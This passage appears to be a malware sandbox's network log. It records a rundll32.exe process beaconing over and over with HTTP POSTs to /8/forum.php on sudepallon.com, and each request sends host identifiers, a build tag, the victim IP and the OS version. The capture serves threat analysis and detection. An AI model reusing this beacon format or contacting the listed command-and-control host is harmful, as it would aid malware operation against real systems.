                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nZVEAARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              83 | 192.168.2.3 | 49810 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:00.280903101 CEST | 5482 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.349575043 CEST | 5483 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 54 47 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nQTGJARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              84 | 192.168.2.3 | 49811 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:00.281486988 CEST | 5483 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.348428011 CEST | 5483 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 4a 51 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nJJQQARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              85 | 192.168.2.3 | 49812 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:00.355448961 CEST | 5484 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.423037052 CEST | 5484 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 5a 41 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nFZAUARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              86 | 192.168.2.3 | 49813 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:00.661691904 CEST | 5486 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.729387045 CEST | 5486 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 59 41 5a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nYAZBARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              87 | 192.168.2.3 | 49814 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:00.666764975 CEST | 5486 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.732692957 CEST | 5487 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nMKPNARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              88 | 192.168.2.3 | 49815 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:00.762145042 CEST | 5487 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.831780910 CEST | 5488 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nFBYUARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              89 | 192.168.2.3 | 49816 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:01.033865929 CEST | 5489 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.100677967 CEST | 5490 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nMJQNARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              9 | 192.168.2.3 | 49729 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:24.447570086 CEST | 678 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:24.515688896 CEST | 679 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:26 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nTZAGARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              90 | 192.168.2.3 | 49817 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:01.050764084 CEST | 5489 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.115972042 CEST | 5490 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nAVEZARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              91 | 192.168.2.3 | 49818 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:01.186212063 CEST | 5491 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.253911018 CEST | 5491 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:02 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 56 45 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nVVEEARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              92 | 192.168.2.3 | 49819 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:01.431991100 CEST | 5492 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:01.500164032 CEST | 5493 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nQYBJARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              93 | 192.168.2.3 | 49820 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:12:01.441323996 CEST | 5493 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Timestamp: Jul 9, 2021 03:12:01.506544113 CEST | kBytes transferred: 5493 | Direction: IN
                              Data: HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 46 55 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cCFUXARRABw==0


                              Session ID: 94 | Source IP: 192.168.2.3 | Source Port: 49821 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp: Jul 9, 2021 03:12:01.600835085 CEST | kBytes transferred: 5494 | Direction: OUT
                              Data: POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Timestamp: Jul 9, 2021 03:12:01.669900894 CEST | kBytes transferred: 5495 | Direction: IN
                              Data: HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTZAGARRABw==0


                              Session ID: 95 | Source IP: 192.168.2.3 | Source Port: 49823 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp: Jul 9, 2021 03:12:01.817991972 CEST | kBytes transferred: 5496 | Direction: OUT
                              Data: POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Timestamp: Jul 9, 2021 03:12:01.886123896 CEST | kBytes transferred: 5496 | Direction: IN
                              Data: HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 51 4a 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cFQJUARRABw==0


                              Session ID: 96 | Source IP: 192.168.2.3 | Source Port: 49822 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp: Jul 9, 2021 03:12:01.818382978 CEST | kBytes transferred: 5496 | Direction: OUT
                              Data: POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Timestamp: Jul 9, 2021 03:12:01.886146069 CEST | kBytes transferred: 5497 | Direction: IN
                              Data: HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 54 47 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVTGEARRABw==0


                              Session ID: 97 | Source IP: 192.168.2.3 | Source Port: 49824 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp: Jul 9, 2021 03:12:01.998018980 CEST | kBytes transferred: 5498 | Direction: OUT
                              Data: POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Timestamp: Jul 9, 2021 03:12:02.066504955 CEST | kBytes transferred: 5498 | Direction: IN
                              Data: HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 47 48 53 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cGHSTARRABw==0


                              Session ID: 98 | Source IP: 192.168.2.3 | Source Port: 49825 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp: Jul 9, 2021 03:12:02.194227934 CEST | kBytes transferred: 5499 | Direction: OUT
                              Data: POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
